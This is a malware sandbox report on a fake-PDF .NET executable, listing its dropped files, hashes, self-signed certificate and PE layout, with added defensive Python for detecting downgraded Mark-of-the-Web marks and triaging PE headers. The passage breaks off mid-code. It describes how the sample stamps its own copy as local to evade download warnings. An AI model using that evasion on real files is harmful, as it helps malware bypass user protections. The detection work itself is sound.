                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.4.<./.P.i.d.>.......
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERE7A7.tmp.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4723
                                                      Entropy (8bit):4.475785460676651
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsRtJgtWI9wWWSC8Bk8fm8M4JGFFYj+q8v+yVMELwbd:uITfRHv3SNbJJKfVMELwbd
                                                      MD5:5403042C0FA68A40D44287EE35CCC8F3
                                                      SHA1:0B2F43EF3DA9C3AB35D287460737010FE11613CB
                                                      SHA-256:39A6C3FF1D175ECB94BDE8D416A1FB692F64BA82454583294E8D51AFF695814D
                                                      SHA-512:F0B70955597707A933E53485D5EE273A66AA363C4458A2B72115AF689059582ADD465B7DBC4DDB86EB262F66E8D41B704D9094A67E202E8F42A38C37467C5145
                                                      Malicious:false
                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873702" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREA12.tmp.WERInternalMetadata.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8390
                                                      Entropy (8bit):3.6943474843351978
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi4p6QHF6YruSUhAWgmfZqM0Si9+prs89bb3sfHVpm:RrlsNi+6Q6YySUhAWgmfeSiAb8fHy
                                                      MD5:99AF9A5B916494A08C513CC4D713995D
                                                      SHA1:85DD797033D350CC98E4F83DD70A9193197EC8CD
                                                      SHA-256:E4A593F968A1752FF5BF66598BB5159C3BFE845D8F1781422BE14F5E64D50D98
                                                      SHA-512:F568152A73527C2CDD67030AB9B19035C24B86683F5D4358B141F84AF33478CA671E69AAB42A42C66E8558E62C96D703B8D503CCE6657FDFEFFFACC60181DB30
                                                      Malicious:false
                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.5.6.<./.P.i.d.>.......
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREEE5.tmp.WERInternalMetadata.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):7998
                                                      Entropy (8bit):3.6941669740699177
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi8C6bGe6YrNSUhAWgmfZqM0Sz9+pru89bgHsfsoAm:RrlsNih6z6YRSUhAWgmfeSz+gMfb
                                                      MD5:F68AE6BDC9F67D23E10C5DECA86E9674
                                                      SHA1:FDDF865EF0B20B9EE7DD36240177CEA0F0454F88
                                                      SHA-256:8EE20E035E1EED40A297F53E12ACA9BF56658BD48E31D4D882857B6FAF758214
                                                      SHA-512:3EA5651B1233489C0813A510E12425DEC0D910FA5C07F75712D308FD2F73A9408E343BEF56EBEEDDF052BF3C0EC43C9D6394B0F7D0709D56BE392C76AED42697
                                                      Malicious:false
                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.7.2.<./.P.i.d.>.......
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF176.tmp.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4668
                                                      Entropy (8bit):4.44887533423625
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsFJgtWI9wWWSC8Brf8fm8M4JGFF7t+q8vPtlCJL9Jd:uITffv3SNqJQKVlCJL9Jd
                                                      MD5:4A6FEB2544B18536223AE619EC866987
                                                      SHA1:9DCE0C120FC0CD26602AB5A77618382168E4CF73
                                                      SHA-256:B84C83D06E691B226920BA9CD3A24377D4545576C761D29200EE479C3E14BBA3
                                                      SHA-512:57C4C3CFB12F5190526AA797084829872571E5B964016965A08FA7AC36AD7F967A59763BCFD43A93446A0046B650D2087FCC34EF2D335A5AF71F27F094D4B2A9
                                                      Malicious:false
                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873704" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA9E.tmp.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4668
                                                      Entropy (8bit):4.449699963602759
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsFJgtWI9wWWSC8B88fm8M4JGFFM+q8vPBlCJL9VTd:uITffv3SNLJ9KZlCJL9VTd
                                                      MD5:8CD215F7E8B442A213EDB37D7C92D3A0
                                                      SHA1:7973FDA7C8FF34D1C544B35D61D22B2D1026030E
                                                      SHA-256:ACCFD4824E99529B8ABB6707E821E528A9B344F86D9678743E5A87312F22111E
                                                      SHA-512:324540B00EBF02D4886AADF4AFA89B10FC888D9B08167A4C0157CF73C1BD825FE266305C97457EC422AA6893BB7570B7342BAD24791D2FEBABAD50EC9D8784DF
                                                      Malicious:false
                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873704" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                      Process:C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):30816
                                                      Entropy (8bit):6.915219173799537
                                                      Encrypted:false
                                                      SSDEEP:384:ghiAhOVUOxO7CX5KGSKtWf0gl1QSrKHkvN9Abr8kIKFrq1ASLHqVnWA5ju61vkhG:kfhQ7bX0tKtWfIg9AniKFRnWA5nChG
                                                      MD5:9844048A2B7081D223139F100B0FF486
                                                      SHA1:1CB465DAF8E6A202356DB86A9380E94E6CC1FA4D
                                                      SHA-256:283915D333318F5E8E7F30CDF8F8F96723DA7AF6DDAB9C29C6F0B5A687157AA4
                                                      SHA-512:7C1C66C45E3B375D3E3819739BF32EE89FB1A7BC3623273CFD65109412CA3DDE0907EC789CF331A1653F2857377E698073E02C03E3F009DB67525C7862125DA3
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 22%
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....F...............0..Z...........x... ........@.. ..............................k.....@..................................x..O....................b..`............................................................ ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............`..............@..B.................x......H........'...Q...........................................................*".(.....*~s.........s.........s.........*B.(.......(.....*.0............(......(......(.....s......(......~....o..........%.r...pr...p~-...o!...(.....o.......+F+...&.........o...........,%..(......(......(.......(.....o.........X....i2..(...........%..o.......+...*..0...........s.....*.0..M..............%.r...pri..p~-...o!....%.rm..pr...p~-...o!.....s.....+...'.....o.....*....0............(.....r...pr..
                                                      C:\Users\user\AppData\Roaming\NewApp\NewApp.exe:Zone.Identifier
                                                      Process:C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview: [ZoneTransfer]....ZoneId=0
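
The NewApp.exe drop above carries the same MD5, SHA-1 and SHA-256 as the submitted sample (it is a byte-for-byte self-copy into AppData\Roaming), and the sample then writes a Zone.Identifier stream on it with ZoneId=0 (Local Machine), which is what the "Hides that the sample has been downloaded from the Internet" signature refers to: a browser download would carry ZoneId=3 (Internet), and a copy stamped as local no longer triggers SmartScreen or the open-file prompt. The following check is an added example for this page, not code from the sandbox vendor. The two stream contents are constructed: the first reproduces the report's 26-byte preview "[ZoneTransfer]....ZoneId=0" with the four unprintable bytes assumed to be CR LF CR LF, the second is the usual shape of a browser download with placeholder URLs.

```python
# Mark-of-the-Web (Zone.Identifier) check for freshly created files.
# Added example; constructed inputs, not data extracted from the sample.

ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "Trusted",
              3: "Internet", 4: "Restricted"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}

# Constructed stream contents (see lead-in). The first mirrors the report's
# preview for NewApp.exe:Zone.Identifier; the blank line is an assumption.
DROPPED_BY_SAMPLE = b"[ZoneTransfer]\r\n\r\nZoneId=0"
BROWSER_DOWNLOAD = (b"[ZoneTransfer]\r\nZoneId=3\r\n"
                    b"ReferrerUrl=https://mail.example.invalid/\r\n"
                    b"HostUrl=https://mail.example.invalid/0603321WG_0_1%20pdf.exe\r\n")


def parse_zone_identifier(raw):
    """Parse the INI-style stream into a dict; empty if no [ZoneTransfer] block."""
    fields, in_block = {}, False
    for line in raw.decode("utf-8", errors="replace").splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_block = line[1:-1] == "ZoneTransfer"
        elif in_block and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def classify(stream, writer_process):
    """Label a new file from its Zone.Identifier contents (None if the stream
    is absent) and the image name of the process that wrote the stream."""
    if stream is None:
        return "no-motw"
    try:
        zone = int(parse_zone_identifier(stream).get("ZoneId", ""))
    except ValueError:
        return "malformed"
    if zone >= 3:
        return "marked-" + ZONE_NAMES.get(zone, str(zone)).lower()
    # A LocalMachine/Intranet/Trusted mark written by something other than a
    # browser is how this sample launders its own copy: flag the writer.
    if writer_process.lower() not in BROWSERS:
        return "motw-downgraded-by-" + writer_process
    return "marked-" + ZONE_NAMES[zone].lower()
```

On a live host the stream is read with PowerShell's Get-Content -Stream Zone.Identifier, and Sysmon Event ID 15 (FileCreateStreamHash) records the creating process together with the stream contents, which is the telemetry this classification is meant to run over: a ZoneId below 3 written onto a new PE by a non-browser process is the condition to alert on.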

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):6.915219173799537
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:0603321WG_0_1 pdf.exe
                                                      File size:30816
                                                      MD5:9844048a2b7081d223139f100b0ff486
                                                      SHA1:1cb465daf8e6a202356db86a9380e94e6cc1fa4d
                                                      SHA256:283915d333318f5e8e7f30cdf8f8f96723da7af6ddab9c29c6f0b5a687157aa4
                                                      SHA512:7c1c66c45e3b375d3e3819739bf32ee89fb1a7bc3623273cfd65109412ca3dde0907ec789cf331a1653f2857377e698073e02c03e3f009db67525c7862125da3
                                                      SSDEEP:384:ghiAhOVUOxO7CX5KGSKtWf0gl1QSrKHkvN9Abr8kIKFrq1ASLHqVnWA5ju61vkhG:kfhQ7bX0tKtWfIg9AniKFRnWA5nChG
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....F...............0..Z...........x... ........@.. ..............................k.....@................................

                                                      File Icon

                                                      Icon Hash:00828e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4078fe
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Authenticode Signature

                                                      Signature Valid:false
Signature Issuer:C=???????????????????????????????????????, S=帇币巴帔布帎市巯帉帒, L=⦓⦴⦤⦴⧀⧈⦝⦣⦱⦔⦷⦗⦱⦒⦸⦩⦺⦼⧇, T=(16 CJK compatibility ideographs: U+FA48 U+FA4C U+FA4A U+FA48 U+FA5F U+FA73 U+FA78 U+FA52 U+FA5E U+FA78 U+FA55 U+FA5E U+FA57 U+FA59 U+FA4A U+FA49), E=????????????????????????????????????????????????, OU=(26 Private Use Area code points: U+F70C U+F6E2 U+F708 U+F6ED U+F70A U+F6DC U+F703 U+F706 U+F700 U+F6FE U+F70A U+F6F5 U+F6D8 U+F6FA U+F6DF U+F6E8 U+F6E7 U+F70B U+F708 U+F6EA U+F6E6 U+F6E3 U+F700 U+F6D8 U+F6FE U+F70C), O=鵸鵋鵄鵅鵔鵭鵌鵃鵭鵍, CN=(11 Private Use Area code points: U+E927 U+E8FB U+E906 U+E91E U+E911 U+E8F9 U+E909 U+E905 U+E92A U+E911 U+E8F3)
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 2/22/2021 10:10:05 PM 2/22/2022 10:10:05 PM
                                                      Subject Chain
• C=???????????????????????????????????????, S=帇币巴帔布帎市巯帉帒, L=⦓⦴⦤⦴⧀⧈⦝⦣⦱⦔⦷⦗⦱⦒⦸⦩⦺⦼⧇, T=(16 CJK compatibility ideographs: U+FA48 U+FA4C U+FA4A U+FA48 U+FA5F U+FA73 U+FA78 U+FA52 U+FA5E U+FA78 U+FA55 U+FA5E U+FA57 U+FA59 U+FA4A U+FA49), E=????????????????????????????????????????????????, OU=(26 Private Use Area code points: U+F70C U+F6E2 U+F708 U+F6ED U+F70A U+F6DC U+F703 U+F706 U+F700 U+F6FE U+F70A U+F6F5 U+F6D8 U+F6FA U+F6DF U+F6E8 U+F6E7 U+F70B U+F708 U+F6EA U+F6E6 U+F6E3 U+F700 U+F6D8 U+F6FE U+F70C), O=鵸鵋鵄鵅鵔鵭鵌鵃鵭鵍, CN=(11 Private Use Area code points: U+E927 U+E8FB U+E906 U+E91E U+E911 U+E8F9 U+E909 U+E905 U+E92A U+E911 U+E8F3)
Issuer and subject are identical, so the certificate is self-signed, which is why the chain terminates in an untrusted root. Every name field is filler drawn from CJK, mathematical-symbol, compatibility and private-use ranges, and the C and E fields contain characters the report could not render at all; none of it identifies a real signer.
                                                      Version:3
                                                      Thumbprint MD5:882F844D38F62D70B33C89F8B3B42F12
                                                      Thumbprint SHA-1:024452A48DED5FE26DA1685D19C0A708D79CF72F
                                                      Thumbprint SHA-256:6A35C18EA225DE1AD541624DED413AF973F9B47652120445A602CBF42707BBB5
                                                      Serial:00C787C965A073F7188E620669BD861A00

                                                      Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
(the remainder of the preview is zero padding, which the disassembler renders as a long run of "add byte ptr [eax], al")

The single real instruction is the standard native stub of a .NET executable: 0x402000 is the ImageBase 0x400000 plus the IAT RVA 0x2000 listed under Data Directories, and that 8-byte IAT holds exactly one entry, mscoree.dll _CorExeMain (see Imports). Execution passes straight into the CLR, which loads the managed code, so the behaviour described in the Signatures lives in the IL, not at this entry point.

                                                      Data Directories

Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x78ac          | 0x4f         | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x8000          | 0x3e0        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x6200          | 0x1660       | .text (see note)
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xa000          | 0xc          | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

Note: the SECURITY entry holds a raw file offset rather than an RVA, so its ".text" attribution is an artefact of the table. 0x6200 + 0x1660 = 0x7860 = 30816 bytes, the file size, so the Authenticode blob is simply the last 5728 bytes of the file. The non-empty COM_DESCRIPTOR (CLR header) entry at 0x2008 is what marks the file as a .NET assembly.

                                                      Sections

Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy         | Characteristics
.text  | 0x2000          | 0x5904       | 0x5a00   | False    | 0.648003472222  | data      | 6.81509040875   | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc  | 0x8000          | 0x3e0        | 0x400    | False    | 0.462890625     | data      | 3.51870730291   | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa000          | 0xc          | 0x200    | False    | 0.041015625     | data      | 0.0611628522412 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
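
The Static PE Info, Entrypoint Preview and Data Directories values above lend themselves to three mechanical checks: a compile timestamp that lies after the date the file was first seen and outside its own signing certificate's validity window, an Authenticode blob that must occupy exactly the tail of the file, and a .NET entry point that must be the FF 25 stub jumping through the IAT. The script below is an added example written for this page, not code from the sandbox vendor. It parses a PE32 header with the standard library only and runs the checks against a constructed skeleton image (not the real sample) using the report's TimeDateStamp, first-seen time and certificate dates; the certificate times are assumed to be UTC.

```python
import struct
from datetime import datetime, timezone

DIR_SECURITY, DIR_IAT, DIR_COM_DESCRIPTOR = 4, 12, 14   # PE data directory indexes

# Reference points from the report: first packet 09:31:55 CET on 23 Feb 2021,
# certificate valid 22 Feb 2021 to 22 Feb 2022 (assumed UTC), TimeDateStamp 0x88460DE1.
SEEN_AT = datetime(2021, 2, 23, 8, 31, 55, tzinfo=timezone.utc)
CERT_NOT_BEFORE = datetime(2021, 2, 22, 22, 10, 5, tzinfo=timezone.utc)
CERT_NOT_AFTER = datetime(2022, 2, 22, 22, 10, 5, tzinfo=timezone.utc)
SAMPLE_TIMESTAMP = 0x88460DE1


def parse_pe32(data):
    """Headers of a PE32 image: timestamp, entry RVA, image base, data directories, sections."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4
    _, nsect, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not PE32 (PE32+ lays the optional header out differently)")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsect):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode(), va, vsize, rawptr, rawsize))
    return {"timestamp": timestamp, "entry_rva": entry_rva, "image_base": image_base,
            "dirs": dirs, "sections": sections}


def rva_to_offset(sections, rva):
    for _, va, vsize, rawptr, rawsize in sections:
        if va <= rva < va + max(vsize, rawsize):
            return rawptr + (rva - va)
    raise ValueError("RVA 0x%x is outside every section" % rva)


def entry_is_clr_stub(data, info):
    """A .NET PE32 entry is FF 25 <abs addr>: jmp through the IAT slot the loader fills
    with mscoree!_CorExeMain. Confirm the indirect target really lies inside the IAT."""
    off = rva_to_offset(info["sections"], info["entry_rva"])
    if data[off:off + 2] != b"\xff\x25":
        return False
    target = struct.unpack_from("<I", data, off + 2)[0] - info["image_base"]
    iat_rva, iat_size = info["dirs"][DIR_IAT]
    return iat_rva <= target < iat_rva + iat_size


def signature_covers_tail(data, info):
    """The security directory is a raw file offset; a well-formed blob ends exactly at EOF."""
    off, size = info["dirs"][DIR_SECURITY]
    return size > 0 and off + size == len(data)


def triage(data, seen_at, not_before, not_after):
    """Return triage findings for one PE32 file (all datetimes UTC-aware)."""
    info = parse_pe32(data)
    built = datetime.fromtimestamp(info["timestamp"], tz=timezone.utc)
    findings = []
    if built > seen_at:
        findings.append("compile timestamp is in the future: " + built.isoformat())
    if not not_before <= built <= not_after:
        findings.append("compile timestamp outside signing certificate validity")
    if info["dirs"][DIR_COM_DESCRIPTOR][1]:
        findings.append("CLR header present: .NET assembly")
        if not entry_is_clr_stub(data, info):
            findings.append("entry point is not the standard _CorExeMain stub")
    if signature_covers_tail(data, info):
        findings.append("Authenticode blob present and spans to end of file")
    return findings


def build_sample_pe(timestamp):
    """Constructed PE32 skeleton, not the real sample: one .text section at RVA 0x2000
    with an 8-byte IAT, a CLR header slot at 0x2008 and jmp dword ptr [0x402000] at
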